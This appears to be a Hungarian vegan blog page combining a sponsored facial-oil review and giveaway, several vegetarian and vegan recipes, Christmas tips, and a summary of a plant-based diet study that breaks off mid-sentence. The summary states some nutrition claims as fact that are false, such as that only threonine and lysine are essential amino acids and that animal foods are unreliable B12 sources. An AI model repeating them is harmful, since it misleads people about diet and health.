Távol állok a beauty blogolástól, nem vagyok a téma szakértője, de többen kérdeztétek már, hogy milyen natúrkozmetikai termékeket használok, ezért indítok egy sorozatot itt a blogon (vegán szépségápolás), amelyben vegán kozmetikai, szépségápolási termékeket mutatok be, amelyeket kipróbáltam, használok és nagyon jónak tartok. Arra, hogy mit kenek az arcomra (nyaktól felfelé) már lassan tíz éve odafigyelek, de nyilván az idősödés újabb vékonyka ráncokkal jár és rájöttem, hogy ha csak egy kicsivel több időt fordítok magamra, már sokat tettem magamért, azért, hogy lestrappált anyaként kicsit jobban érezzem magam és igen, lassítsam az öregedés folyamatát is, csak egy icike-picikét. Általában fiatalabbnak néznek a koromnál, ez jól esik az egómnak – lehet, hogy hála annak a krémnek, amit már jó néhány éve használok? Nem tudom… talán igen, de azt nagyon fontosnak tartom, hogy időben elkezdjük a korunknak megfelelő bőrápolást. Amióta anya vagyok azóta tényleg nagyon kevés időt szánok magamra. Amíg régen kétszer mostam hajat egy héten, most csak egyszer (mondjuk egyik várandósságom alatt sem zsírosodott a hajam, ekkor szoktam rá a heti egyszeri hajmosásra). Hajpakolás évente egyszer kerül a hajamra, arcpakolást nagyon ritkán lát az arcom, noha mindegyikből többet szeretnék. Meg néha jól jönne egy kis wellnesezés, amikor befekszem a kádba, bedobok egy fürdőgolyót, lazítok és kikapcsolok végre a hektikus hétköznapokból. A Perla organikus arcápoló olajat nemrég ismertem meg. Kizárólag hidegen sajtolt, finomítatlan, bio minősítésű olajokat és megtisztelő Demeter minősítésű illóolajokat tartalmaz – jojoba, ligetszépe, szőlőmag, ricinus, tamanu, római kamilla, pálmarózsa, vanília, édesnarancs, vetiver, teafa, linaloefa. Olyannyira a napom részévé vált, hogy napközben többször eszembe jut az újonnan beiktatott kis rutinom és elkezdem várni az estét, hogy csak öt percre is, de egy wellness kényeztetésen érezzem magam. A Perlaval lehet sminket is eltávolítani, én viszont ápolásra használom, mert a munka, a háztartás és a gyerekek mellett alig jut időm magamra, de felismertem, hogy vágyom a puha, hidratált bőrre. A Perlaval beolajozom az arcom, jól átmasszírozom, majd egy meleg vízzel átitatott kis törölközőt az arcomra teszek és várom, hogy egy-két perc alatt a törölköző kihűljön, jól átdörzsölöm vele az arcomat és már készen is vagyok. A nap végén ezt a “luxust” megengedni magamnak, a legjobb dolog. Másnap tényleg tisztább a bőröm, kipihentebbnek tűnök és olyan jól érzem magam tőle. A Perla csodaszép dobozban érkezik… A Perla megálmodójával és létrehozójával, Geosics Reginával beszélgettem az alkotásról, a termékről… Hogyan jött az ötlet és mikor, hogy létrehozz egy ilyen terméket? Mi volt a cél, milyen terméket szerettél volna és miért? Mindig is problémás bőrrel rendelkeztem, ami körülbelül fél évvel ezelőtt tetófokára hágott… nem csak esztétikailag volt zavaró, de már fájt is a gyulladástól. Szeretem holisztikusan megközelíteni a dolgokat, de akkor úgy éreztem, hogy a táplálkozásommal, életmódommal kapcsolatosan minden tőlem telhetőt elkövetek és “kívül” kell a megoldást keresnem… Emellett kisfiam születése óta folyamatosan keresem azokat a megoldásokat amik leegyszerűsítik az életemet. Ekkor jött szembe egy módszer, az OCM (oil cleaning method) ami itthon még nem túl elterjedt, de külföldön már egyre népszerűbb. Azonnal éreztem, hogy ezt nekem is ki kell próbálnom, de itthon nem találtam hozzá megfelelő minőségű és összetételű olajkeveréket, külföldről pedig túlságosan költséges lett volna rendelni. Így óriási kutatásba kezdtem, annyira belelkesedtem, hogy éjjel-nappal csak ezzel foglalkoztam – nyilván amennyire lehet egy totyogó mellett. Megalkottam a számomra tökéletes kompozíciót és nagyon rövid időn belül látványos eredményt értem el. Környezetemben is felfigyeltek rá és kérték, hogy nekik is keverjek ki Perlát (aminek akkor még nem volt neve). Ekkor bevillant, hogy ha ennyire hatásos és ennyire nem ismerik még Magyarországon, miért ne lehetne mások számára is elérhető. Szeretném terjeszteni magát a módszert és a Perlát is, hogy minél több nőhöz eljusson. Annyira fontos, hogy mi az amit magunkra kenünk és – habár egyre több tudatos nővel találkozom – az emberek nagy részének fogalma sincs arról, mit ken magára. Milyen szakemberekkel (vagy kikkel) dolgoztál együtt a termék létrehozása során? A receptet végül egy fantasztikus aromaterapeuta segítségével tökéletesítettük, akitől sokat tanultam és még inkább felnyitotta a szemem, hogy illóolajból csakis a legeslegjobbat érdemes használni. Óriási erő egy kis cseppben, nem is gondolnánk milyen hatással van ránk – nem csupán érzékeinkre, de hangulatunkra, lelkünkre, testünkre. Azóta az illóolajok szerelmese vagyok. A folyamatban részt vett még egy vegyész és a manufaktúra tulajdonosa, ahol minden egyes Perla készül. Milyen magyar vagy nemzetközi minősítésekkel rendelkezik a termék (Vegan, Cruelty Free, Cosmos Naturel, Biokontroll Hungária Kft, stb.)? A Perla vegán termék és természetesen állatkísérletektől mentes valamint az összes összetevő bio gazdálkodásból származik, sőt az illóolajok a megtisztelő Demeter minőséggel rendelkeznek. A kész terméket még nem szertifikáltattuk, de tervben van. Hosszú és költséges a folyamat, amit kezdő családi vállakozásként egyelőre még nem tudunk vállalni. Tudom, hogy a hivatalos minősítés fontos, de ami még fontosabb, hogy minden este olyan tiszta lelkiismerettel fekszem le, mint amilyen tiszta a Perla is! Tervezel el termékbővítést? Ha igen, mi lesz a következő terméked? Először azt gondoltam, hogy egy tökéletes termék legyen, ami használható tisztításra, sminkeltávolításra, arc- és testápolásra… azóta persze beindult a fantáziám. Nem tervezek széles termékpalettát, de egy-két egyedi ötletem, álmom van, amit még szeretnék megvalósítani. Azt még nem tudom, melyik lesz a következő! Regina blogja, a Feminie A Perla elérhető az alábbi linkeken: – weboldal – Facebook – Instagram A termékeket a {Perla Skincare} biztosította a teszteléshez. A véleményem csakis a sajátom. ***** NYEREMÉNYJÁTÉK!!! Nyeremény : Egy üveg (50 ml) Perla többfunkciós organikus olaj. Írjátok meg ide a bejegyzés alá kommentben, hogy ti milyen natúrkozmetikai, szépségápolási terméket (márkát) használtok, amely nagyon bevált számotokra. Szabályok : Kérem, hogy az alábbi formula minden pontját töltsétek ki (bejelentkezés email címmel a formulába): kommentelés (ide a bejegyzés alá) és plusz pontokért lájkoljátok a Perla Facebook, illetve Instagram oldalát. 2017. március 6-ig lehet játszani. Sorsolás a Rafflecopter szoftverrel. Eredményhirdetés 2017. március 7-én. A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyereményt a nyertesnek a Perla Skincare postázza magyarországi címre. a Rafflecopter giveaway
Rakott édesburgonya (vegán)
Bár édesburgonyának hívjuk, nem csak Magyarországon, Angliában is, valójában a batátának semmi köze nincs a burgonyához, legfeljebb a hasonló alak és a földben termő gumó/gyökér. Mégis, ha lehetne, lecserélném a krumpli és az édesburgonya pozícióját a magyar háztartásokban. Milyen lenne, ha egy jó kis krumplistészta számítana kuriózumnak, nem pedig a batátából készült ételek? :) Kérdésem költői kérdés, mielőtt bárki kommentben erre választ hagyna. Szóval ha még nem próbáltad az édesburgonyát, íme egy szokványos recept, rakott batáta. Szabadon variálhatod, mivel rakod össze, most tofuval és gabonakolbásszal készítettem el. A recept Hozzávalók: - 8 közepes batáta/édesburgonya - egy szál gabonakolbász - 1 csomag tofu - szójajoghurt - só - kókuszzsír - víz Elkészítés: A megmosott batátákat héjastól vízben megfőzzük, de ne túl puhára. Közben felszeleteljük a tofut, majd a kolbászt kókuszzsírral kikenünk egy tűzálló tálat. A joghurtba keverhetünk pl. provance fűszerkeveréket, vagy csak egy kis ételízesítőt, de ez el is maradhat. A megfőtt batátákat hideg vizzel átzuhanyoztatjuk, majd ha picit lehűltek, megpucoljuk őket, majd felkarikázzuk. A tűzálló tálba először egy sor felkarikázott batátát teszünk, megsózzuk, majd tofut, szintén megsózzuk (vagy használhatunk valamilyen fűszerkeveréket is só helyett). Kolbászkarikákat teszünk le következőnek. Mindezt addig ismételjük, míg minden el nem fogy. A legjobb, ha édesburgonya, azaz batáta kerül a tetejére. Legvégül joghurttal megkenjük. Ezután mehet a sütőbe, ahol pirulásig sütjük.
Diós csigák
Leila hercegnő második számú kedvence ;) A legtöbb ember a péksüteményt ma már csak egy utcai bódéban tudja elképzelni. Persze, hiszen minden második sarkon van már pékség. Egyik ilyen, másik olyan, mi meg válogatunk, fanyalgunk vagy akár ácsingózunk rajtuk. Aztán rohanvást gyűrjük le a csigákat meg pogikat az utcán, belebújunk a papírzacskóba, és közben azon morfondírozunk, hogy vajon mekkora az a falat, aminél még úgy tűnik, mintha semmi nem lenne a szánkban. :)))) És fogalmunk sincs már, hogyan kell péksütit sütni, sőt, biztosak is vagyunk benne, hogy ez valami hipernehéz, ultrabonyolult dolog. Pedig nem is! :) Próbáld ki a házi péksütiket, simogasd a tésztát, válogasd össze te az alapanyagaidat, és láss csodát: ez a péksüti bizony nem csak frissen sütve lesz jó, hanem akár másnap is, és újra felfedezed a régen elfeledett ízeket. Csinálj sokat, fagyaszd le, és minden egyes reggel, amikor előveszel egyet, áldani fogod a saját nevedet. ;) Mostantól nincs kifogás, ha a család (én! hehe..) édeset kíván: ezekből a hozzávalókból nálam tényleg mindig van otthon, és itt az én szuper diós csigám, amihez az ihletet Zöldella receptje szolgáltatta. Ezúton is köszönöm neki! :) Hozzávalók két nagy tepsi csigához: - 600 g liszt - 300 ml növényi tej - 125 g langyos kókuszolaj - 100 g nádcukor - 1 csomag vaníliás cukor - 35 g friss élesztő - 3 nagy csipet só A töltelék - 120 g langyos kókuszolaj - 200 g darált dió - 100 g porcukor - A lisztet öntsük egy nagyobb tálba, keverjük hozzá a cukrokat és a sót. Öntsük hozzá a langyos kókuszolajat és a tejben feloldott élesztőt. - Dagasszuk, dolgozzuk jól ki a tésztát, ami akkor jó, ha elválik az edénytől. Ezután kelesszük langyos szobában egy órát. Ha van kenyérsütő gépünk, eyszerűen tegyük bele a tészta alapanyagait, és kapcsoljuk be a dagasztás programot. - Közben keverjük ki a tölteléket a hozzávalókból. - Amikor megkelt a tészta, osszuk ketté, és lisztezett felületen a gombócokat egyenként nyújtsuk 2-3 mm vastag lappá. Ezeket egyenletesen kenjük meg a töltelékkel, majd tekerjük fel rúddá. - Vágjuk másfél-két centi vastag szeleteket a rúdból, és fektessük őket sütőpapírral bélelt tepsire. Hagyjunk a csigák között minimum 2 cm távolságot, hogy később legyen helyük megdagadni. - 200 fokos sütőben süssük meg szép barnára. A sütőbe tegyünk egy kis edényben vizet is, és vigyázzunk, ne száradjon ki a tészta. Miután kivettük, a még forró csigák tetejét megkenegethetjük növényi tejjel. Jó étvágyat! Elkészítési idő: 20 perc (+kelesztés, sütés) Ez egy vegán recept volt. :) Ha tetszett, hasonlókat ITT találsz. Letöltheted a két ajándék receptgyűjteményt is. Nézd meg a legújabb Kertkonyha főzőtanfolyamokat : Kezdő Vegán Magyaros Konyha Vegán Módra Növényi Tejek és Tejtermékek Görög Vegán Szendvicskrémes
Mexikói zöldségkeverékes rakott krumpli, amikor két távoli nemzet találkozik egy ételben (gluténmentes, vegetáriánus)
Valahogy, amikor Magyarországon vagyok sokkal többször kívánok meg magyar ételt, mint amikor külföldön tartózkodom. Nem tudom mi lehet ennek az oka...? Soha máshol nem eszem annyiszor burgonyás ételt, mint magyar földön. Szerintem ez egyfajta tudatalatti állapot, amikor az agyam felismeri melyik országban járok éppen és elkezdi hozzárendelni az adott ország jellegzetes ételeit... Érthetetlen, de igaz. :-) Most sem volt ez másként... mexikói zöldségkeverékes rakott krumpli Napokig nem járt más az eszemben mint, hogy úgy ennék egy finom rakott krumplit. Hiába próbáltam elfelejteni, csak nem tudtam. Évek óta nem ettem. Akárhányszor belegondoltam, hogy kolbász nélkül készítem el az eredeti rakott krumplit, mindig egy üres és íztelen ételt láttam magam előtt: krumpli, tojás és tejföl... Nem igazán csigázott fel. Végül addig-addig agyaltam a kérdésen még megszületett ez az isteni finom mexikói zöldséges, vegetáriánus rakott krumpli! Eredetileg csak ceruzababot szerettem volna bele venni, de azt nem kaptam. Így bevállaltam egy meredeket és Mexikót összehoztam a magyar rakott krumplival! :-o Olyan finom lett, hogy a púposan megpakolt tányér kevésnek bizonyult egy étkezésre. :-) A recept végtelenül egyszerűen elkészíthető és még a húsevő családtagok is szeretni fogják, akiknek nem árt, ha néha több zöldséget fogyasztanak. ;-) mexikói zöldségkeverékes rakott krumpli (gluténmentes, húsmentes, vegetáriánus) HOZZÁVALÓK (kb. 4 személyre) - 1,5 kg burgonya - 5 db (házi) tojás - fűszerek: Himalája só, fekete (frissen) őrölt bors, 2 tk füstölt pirospaprika fűszer, 1 kk mustár - 500 ml (bio) tejföl (1 nagy doboz) - kb. 300 g mexikói zöldségkeverék (fagyasztott) mexikói zöldségkeverékes rakott krumpli (gluténmentes, húsmentes, vegetáriánus) ELKÉSZÍTÉS 1) Feltesszük héjában, vízzel teli fazékban, fedő alatt főni a burgonyákat. Nem kell teljesen szétfőzni. Burgonyától függ a főzési idő. (Nekem kb. 30 perc volt.) 2) Tegyük fel a tojásokat is 8-10 percre főni. Miután elkészült távolítsuk el a héját és vágjuk karikára őket. 3) A megfőtt burgonyákat (miután kihűlt) meghámozzuk és tetszés szerint karikákra vagy random formára felvágjuk. 4) A tejfölt kikeverjük a fűszerekkel. Kóstoljuk meg és sózzuk, borsozzuk az ízlésünk szerint. 5) Vegyünk elő egy mély, hőálló jénai tálat, amelyben a rakott krumplit át tudjuk majd sütni. 6) Tegyünk a tál aljára egy réteg burgonyát, melyet kissé összekeverhetünk a fűszeres tejföllel. Ezután szórjuk meg a felkarikázott főtt tojással, majd borítsuk rá a fagyasztott zöldségkeveréket. Ismét egy újabb réteg burgonya következik, mellyel gyakorlatilag lefedjük az ételt. A tetejére csurgassuk a maradék fűszeres tejfölt. (Ha diétánk engedi megszórhatjuk az egészet reszelt sajttal is.) 7 ) 180°C-ra előmelegített sütőben kb. 15-20 perc alatt összesütjük az ételt és már tálalhatjuk is a húsmentes rakott krumplinkat. Jó étvágyat kívánok hozzá! mexikói zöldségkeverékes rakott krumpli (gluténmentes, húsmentes, vegetáriánus) TÁPLÁLKOZZ, NE CSAK ÉTKEZZ! :-) Megjegyzés: Vegán társaim egyszerűen hagyják el a tojást (a fekete só használata helyettesítheti a tojás ízt), a tejfölt pedig cseréljék növényi főzőtejszínre, ha 100%-ban növényi főételt szeretnének kapni. Legközelebb én is kipróbálom a vegán verziót is! (Igyekszem minél kevesebb állati fehérjét fogyasztani -húst egyáltalán nem-, de azért néha-néha még előkerül nálam a tojás, a sajt és a tejföl is. Vegetáriánus vagyok, nem vegán.) mexikói zöldségkeverékes rakott krumpli (gluténmentes, húsmentes, vegetáriánus)
Vegan Grill receptek
Vegan Grill receptek, ha gyors, könnyű és finom vegán finomságokra vágytok. Magyarország első vegán grilltermékeinek gyártójától. Már korábban is írtunk a Vegan Grill termékeiről, most pár izgalmas receptet hoztunk nektek, amelyek segítségével könnyen elsajátíthatjátok, hogy milyen könnyű szejtánnal főzni a mindennapokban. Búzahús leves, egy igazi klasszikus újragondolva (Vegan Grill receptek) Hozzávalók: 1 csomag Natúr Szejtán 1 nagyobb fej vöröshagyma 4-6 gerezd fokhagyma Növényi olaj Só, bors, Vegeta ételízesítő 2 nagyobb sárgarépa 1 nagy fehérrépa 3 közepes burgonya 1 karalábé Babérlevél Friss petrezselyem Elkészítés: Vágd apróra a vöröshagymát, majd kevés olajon dinszteld üvegesre egy nagy fazékban. Közben hámozd meg és szeleteld fel a zöldséget (burgonya, répák, karalábé), pucold meg a fokhagyma gerezdeket. A Natúr Szejtánt vedd ki a csomagolásból és vágd falatnyi darabokra. Amikor a hagyma megpuhult, tedd a fazékba az egész fokhagyma gerezdeket, a Natúr Szejtánt, a zöldségeket, ízlés szerint sót, borsot, vegetát, babérlevelet. Forrald fel, majd vedd le a lángot minimumra, és főzd még legalább fél órán át, hogy az ízek összeérjenek. Tálaláskor apróra vágott, friss petrezselyemmel szórd meg. Borsófőzelék szejtán feltéttel (Vegan Grill receptek) Hozzávalók: 1 csomag Natúr Szejtán 60 dekagramm zöldborsó 1,5 deciliter víz 6 deciliter natúr mandulatej 3-4 teáskanál búzaliszt 1 mokkáskanál só 1 csipet bors 1 mokkáskanál szárított oregánó 1 mokkáskanál szárított bazsalikom 1 mokkáskanál őrölt rozmaring 1 mokkáskanál szárnyas fűszerkeverék (vagy más fűszerkeverék, ami kéznél van) 1 evőkanál kókuszolaj Elkészítés: Egy nagyméretű fazékban hevíts fel egy kanál kókuszolajat, majd pirítsd át rajta a zöldborsót. Szórd rá a fűszereket és még egy percig pirítsd tovább. Add hozzá a vizet, illetve 4 deciliter natúr mandulatejet és főzd addig, míg a zöldborsó meg nem puhul. Addig a maradék 2 deciliter mandulatejben keverd el csomómentesre a 4 evőkanál lisztet. Ha hígabban szereted a főzeléket kevesebb lisztet adj a mandulatejhez. Ha a borsó már puha, öntsd a lisztes keveréket a fazékba és addig főzd tovább, míg be nem sűrűsödik. A Natúr Szejtánból vágj vékony szeleteket és egy külön serpenyőben egy kanál kókuszolajon kezd el pirítani. Egy kevés sóval, borssal illetve szárnyas fűszerkeverékkel ízesítsd. Vegán Gyros magyaros szejtánból (Vegan Grill receptek) Hozzávalók: 1 csomag Vegan Grill magyaros hagymás szejtán Pita/Tortilla Paradicsom Kígyó uborka Saláta Lilahagyma Öntethez: 1 evő kanál humusz (elhagyható) 1 evő kanál növényi tejszín só, bors, szárított kapor levél Elkészítés: Pirítsd aranybarnára a Vegan Grill magyaros hagymás szejtánt egy kevés növényi olajon. Amíg pirul vágd fel apróra a zöldségeket, keverd össze a növényi tejszínt a humusszal és fűszerekkel, hogy megkapd az öntetet. Töltsd meg a pitákat a szejtánnal, zöldségekkel és locsold meg az öntettel. A termékpalettát és a boltok listáját, ahol hozzájuthattok a termékekhez a www.vegangrill.hu oldalon tekinthetitek meg, új recept pedig hetente felkerül a Vegan Grill facebook oldalára. Reméljük elkészítitek ezeket az ínycsiklandó fogásokat, jó étvágyat!
Karácsonyi húsmentes menüajánló 2. Főétel
2016. december 17. Éltető ételek
A karácsony nem múlhat el töltött káposzta nélkül. Nagyon sok vegán töltött káposzta receptet olvastam a neten, de nekem valahogy egyik sem tetszett. Vagy szejtán volt benne, ami nem más, mint búzahús - tömény glutén -, vagy szója (tofu) vagy éppen gabona fasírt. Ez utóbbi még talán jó is lett volna, de vidéken azért nem olyan egyszerű beszerezni. Ja... még diós és gombás változatot is találtam, de önmagukban ez sem nyerte el a tetszésemet. Így kénytelen voltam kikísérletezni egy változatot, ami elsőre olyan jól sikerült, hogy azóta már kétszer is elkészítettem. Ennek az ételnek a szíve-borsa maga a fűszerezés. Ezért azt a lehető legjobban találd el, a töltelék bekeverése során kóstolgasd, hogy igazán magyaros legyen az íze. Igazán különleges, és szemet gyönyörködtető a sárga színű polenta friss zöldségekkel és rozmaringos gombával . Nálunk igazán nyerő a fokhagymás-spenótos krumplipüré , amihez bármilyen vegán fasírtot kínálhatsz, de egy egyszerű grillezett padlizsán vagy fűszeres sajt is remek választás.
Tudatos felkészülés a karácsonyra - 7. rész A fények
2016. december 2. Élj harmóniában
Ne engedd, hogy a karácsonyi készülődés feleméssze minden energiádat és pénzedet Szerte a világon, karácsonykor nagyon sok időt, energiát szánnak a családok arra, hogy akár az egész házat kidekorálják karácsonyi izzósorokkal. Szerencsére Magyarországon ez még nem terjedt el. Az izzósorok beszerzése és felrakása már elve sok időt elvesz a hétköznapokból. A világítás ugyan esetenként valóban szép, de nagyon nagy pazarlás a megannyi karácsonyi izzósor használata. Nagyon sok áramot használunk el az elektromos világítással. Légy tudatos karácsonykor is, ha lehet ne pazarold az áramot és a saját pénzedet feleslegesen. Használj karácsonykor hagyományos gyertyákat. Hidd el a kevesebb néha több. A jó hangulathoz nem feltétlenül kell több kilométernyi karácsonyi égő, elegendő néhány hangulatos gyertya a lakás néhány pontján elhelyezve.
Tudományos összegzés a növényi alapú étrend kapcsán
2016. november 28. Vegán lettem
A Pécsi Tudományegyetemen készült egy tanulmány, mely 42 forrást felhasználva, tudományos alapokra helyezve méltatja a növényi alapú étrendet. 2016. augusztus 8-án készült el, és november 20-án jelent meg Magyarország első tudományos minőségű közleménye növényi alapú étrend (Plant-based diet) témában. Születtek már cikkek magyar nyelven, de hivatalosan egyik sem tekinthető tudományos minőségűnek. Ennek fokmérője (sok más szempont mellett), hogy az adott folyóirat, amiben egy közleményt közölnek rendelkezik e impact faktorral. Jelenleg ez az első magyar nyelvű tanulmány a témában, amelyről ezt elmondhatjuk, hogy a válasz: igen! A cikk az Orvosi Hetilap hasábjain jelent meg, amely azért is különösen hangsúlyos, mert a legfontosabb döntéshozók a táplálkozási ajánlások tekintetében még mindig az orvosok, így ez az írás elsősorban nekik szól. Eme cikk a Pécsi Tudományegyetem Egészségtudományi Karának Táplálkozástudományi és Dietetikai Intézetében készült. Témája a növényi alapú étrend, mint elsődleges megelőző étrend bemutatása, valamint az azzal kapcsolatos fehérje, vitamin és ásványi anyag hiányt érintő téveszmék és releváns tények bemutatása, mindezt tisztán egészségügyi és tudományos oldalról megközelítve. Szabó Zoltán, a cikk témájának ötletgazdája és első szerzője három éve vegetariánus, dietetikus, okleveles táplálkozástudományi szakember, jelenleg a Pécsi Tudományegyetem szakoktatója, valamint annak doktori képzésének résztvevője, és akit tanulmányai, kutatásai során felmerült tudományos adatok győztak meg elsődlegesen az életmód váltás fontosságáról. Növényi alapú étrend bevezetés: Első körben egy rövidebb történelmi áttekintést ad a tanulmány a növényi alapú étrend múltjáról, valamint megvilágít egy kutatási területet, mely azon a ma is szóbeszédben forgó hibás feltevésekhez vezet, ami a növényi alapú étrendet egészségtelennek aposztrofálja. A következő, szó szerinti tanulmányból vett idézet egészen precízen mutatja be, hogy milyen káros lehet hosszútávon egy tudományosnak vélt kijelentés, mely általánosítva összegez és nem vesz figyelembe egyértelműnek tűnő, a végső megállapítás témáját gyökeresen meghatározó tulajdonságokat. A szegényebb (első sorban harmadik világbeli) országokban hosszú követéses vizsgálatokat végezve azt tapasztalták, hogy ott a hús és más állati eredetű táplálékok fogyasztása nem megfelelő mennyiségű, így a kutatók azt a megállapítást szűrték le, hogy a nagyfokú alultápláltság az állati eredetű élelmiszerek korlátozott fogyasztásának a következménye. A tévesen levont következtetéseket a mai napig helytelenül magyarázzák az orvosok és a laikusok egyaránt. Ebben az esetben teljesen egyértelmű tulajdonság, hogy nem kifejezetten fehérje vagy egyéb tápanyagok hiányától szenvednek a kutatás alanyai. Nagyfokú alultpláltságuk a kiegyensúlyozott tápanyagszintekkel bíró és főleg változatos étrend hiányából fakad. Ebből adódóan kijelenthető, hogy az egyoldalú és az eredményeket befolyásoló szempontok figyelmen kívül hagyásával meghozott végkövetkeztetés képes kártékonyan befolyásolni még évekkel később is a megítélését a növényi étrendnek. A tanulmány röviden említést tesz a növényi étrend és a vegetarianizmus fajtáiról, valamint azokról a motivációs impulzusokról, amelyek eme irányba terelik a növényi étrendre voksolók többségét. Ha ez a téma érdekel, akkor a tanulmányban olvashatsz róla bővebben, jelen cikkem kapcsán azonban ez nem lényeges információ. Viszont annál fontosabb kijelentés a következő: A tudományosan megalapozott növényi alapú étrend hatásai visszakereshető eredményeken alapulnak. Ez megkülönbözteti a legtöbb divatdiétától, illetve az előbb említett vallási alapú táplálkozási gyakorlatoktól. Így a szakemberek által is széles körben elfogadható. Ennek bizonyítéka, hogy neves kutatók nyilatkoztak a növényi eredetű étrend hatékonyságáról mind primer, mind szekunder prevencióban. Ez egészen konkrétan azt jelenti, hogy bizonyos betegségek megelőzésében, a korai stádiumban diagnosztizált egyes betegségek kezelésében alkalmazzák, valamint bizonyos betegségek súlyosbodását gátolja és a szenvedő gyógyulását segíti elő a növényi alapú étrend. Növényi alapú étrend tápanyagszinten: A tanulmány megállapítja továbbá, hogy a növényi étrend alapanyagai nagy mennyiségben tartalmaznak olyan további élettanilag fontos tápanyagokat mint a fitonutriensek, amelyeket főleg nyers, hőkezeletlen vagy kevésbé hőkezelt állapotban tart meg az étel. A hagyományos tápanyagoktól - fehérje, zsír, szénhidrát, vitaminok, ásványi anyagok - eltéro?en ezek a növényi alkotóelemek nem a hagyományos értelemben véve ,,szükségszeru?ek az emberi szervezet számára. Emellett, ugyan a tanulmány nem említi, de itt kiegészíteném a növényi étrend magas rosttartalmát, amely többek kötött az emésztést és az egészséges bélmozgást segíti elő, valamint, amelytől szinte teljesen mentes minden állati eredetű táplálék. A tanulmány szerint a növényi alapú étrend egy napra vonatkozó általános ajánlása a következők szerint alakul: zöldségek tetszés szerint törekedve a változatosságra; gyümölcsök napi 1-2 bögrényi a változatosságra törekedve; teljes kiőrlésű gabonák vagy gabona alapú köretek napi 2-3 bögre vagy napi 6-11 szelet; hüvelyes növények napi 1 bögre; leveles zöldségek 2-3 bögre nyers formában, vagy 4-6 bögre főtt formában; olajos magvak (dió, mandula, pisztácia stb.) 30-55g; magvak (chia, kendermag, lenmag) 1-3 evőkanál; Növényi tejek 2-3 bögre; friss fűszernövények tetszés szerint. Fontos tudnunk, hogy ez nem minimális, hanem optimális ajánlás. (Forrás: Hever, J.: Plant-based diets: A physicians guide. Perm. J., 2016, 20(3), 93-101.) A fehérjék tekintetében: Fehérje bevitellel kapcsolatos tévhit a laikusok körében, hogy a tisztán növényi étrend elégtelen fehérjetartalma, – azaz, ha valaki mellőzi az állati fehérjék fogyasztását – kóros fehérjehiányt (ilyen a kwashior-kór és marasmus, melyek lényegében csak a harmadik világban ismert betegségek és a krónikus éhezéssel és tápanyaghiánnyal kapcsolódnak össze) és látványos izomfogyást eredményez majd. Ezt ugyan már számos külföldi tudományos kutatás is megcáfolta, de most végre magyarul is olvashatunk erről a tanulmányban. Pár érdekesség: A fehérjéket aminosavak építik fel, amelyek közül a legtöbb szakirodalom jelenleg kilencet tekint esszenciálisnak humán vonatkozásban. Valójában az emberi szervezet csupán két aminosavat nem képes önmaga szintetizálni (treonin, lizin). A treonin és lizin esszenciális aminosavakon kívül, minden más esszenciális aminosavat képes a szervezet szintetizálni bizonyos biokémiai folyamatok útján, ha a táplálkozással elegendő energiát biztosítunk számára. Tehát egyéb aminosavláncokból, esszenciális és nem esszenciálisokból egyaránt képes előállítani a számára éppen fontos fehérjeláncot. Ugyanakkor eme természetes működés egyik fontos alapja növényi alapú étrend esetén a változatos és kiegyensúlyozott táplálkozás folyamatos fenntartása. A tanulmány egy 2007-es FAO/WHO/UNU riport alapján összegzi továbbá a szervezet aminosav szükségletét, láncokra bontva. Ez a hivatalos WHO állásfoglalás tartalmazza továbbá, hogy a felnőtt ember minimális protein szükséglete 0,83 g testsúlykilogrammonként. Az alábbi adatokat egészíteném ki azzal a tanulmányban olvasható információval, miszerint a szervezet naponta átlagosan 90 g elhasznált fehérjét lök ki magából a bélrendszerbe, melynek nagy részét a szervezet újrahasznosítja. Ha emellé vesszük a változatos növényi étrenddel elfogyasztott fehérjemennyiséget, akkor kis számolással könnyen rájöhetünk, hogy a fehérjehiánnyal kapcsolatos felvetés bizony tévhit a vegán étrend kapcsán. Továbbá arról is említést tesz a cikk, hogy a növényi étrenden élőknek jóval magasabb a szérum-albumin szintje. Ez egy olyan laborparaméter, ami - egyebek mellett - arra is használható, hogy megítéljék a szervezet fehérje ellátottságát. A magas szérum-albumin szint annak köszönhető, hogy míg az állati fehérjék fogyasztása folyamatos gyulladásban (inflammáció) tartják a szervezetet, – mely egyébként katabolikus, fehérjebontó állapot is - addig a növényi étrenddel bevitt fehérje nem okoz ilyen jellegű negatív változásokat. Ennek köszönhetően indirekt módon ugyan, de jobb fehérje ellátottságot eredményez a növényi alapú táplálkozás, mint a mindenevő étrend. Pár vitamin tekintetében: A tanulmány továbbá említést tesz a B12, B6 valamint folsav vitaminok és a vas fontosságáról és kijelenti, hogy a B12 állati eredetű ételekből nem vihető be nagy biztonsággal. Ugyan említi, hogy a szárított lila alga aránylag nagy mennyiségű – 77,6 ?g/100g a napi 2,5 ?g ajánlott napi bevitel mellett – B12 vitamint tartalmaz, de arról nem tesz említést, hogy ez a B12 vitamintípusok egyik aktív formája-e, és ha igen melyik az. Ha nem aktív formája, akkor a szervezet nem képes hasznosítani. A vitaminok és ásványi anyagok növényi forrásairól, jellemzőikről bővebb információt egy régebbi cikkemben találsz, valamint az említett vas témájában érdekességeket az eredeti tanulmányban. Növényi alapú étrend és pár betegség: A továbbiakban az elhízásról, mint aggasztó problémáról írnak a cikkben. Magyarországon a lakosság 61,8%-a a BMI alapján túlsúlyosnak minősül (Európában abszolút vezetjük a mezőnyt), mely adat akkor válik igazán érdekessé, amikor hozzáolvassuk az USA átlagos 39%-os túlsúlyossági arányát, mely utóbbi arány évente 5%-kal mutat növekedő tendenciát. Ezzel szemben 2006-ban készült egy 87 tanulmányt összehasonlító metaanalízis, amely azt mutatta ki, hogy a vegetáriánus férfiak és nők jóval kisebb testtömeggel rendelkeztek, mint a vegyestáplálkozású emberek. A 87 tanulmány ténye feltételezi számomra, hogy számos jellemző mentén - demográfia, kor, életminőség, stb. - nagy merítést végezve, relevánsnak mondható ez az adat és senki nem fut bele a már említett tápanyaghiányos előítéletbe. Olyan, az elhízás talaján jelento?s rizikóval kialakuló, szív-ér rendszert érinto? betegségek, mint az angina pectoris, myocardialis ischaemia, AMI, STEMI, corona-riaatherosclerosis, mind megelo?zheto?ek lennének egy helyesen összeállított növényi alapú étrenddel. Szív- és érrendszeri megbetegedések, valamint cukorbetegség esetén is végeztek kísérleteket növényi alapú diétával. A bevitt tápanyagok százalékos aránya mindegyik esetben megközelítőleg a következőképpen alakultak: 10% zsírokból, 15% fehérjéből és 75% komplex szénhidrátokból. Egy ilyen összetételű vegán étrendet hasonlítottak össze, az Amerikai Diabetes Társaság (ADA) által javasolt vegyes étrenddel - ennek pontos jellemzőit a tanulmányban megtalálod - 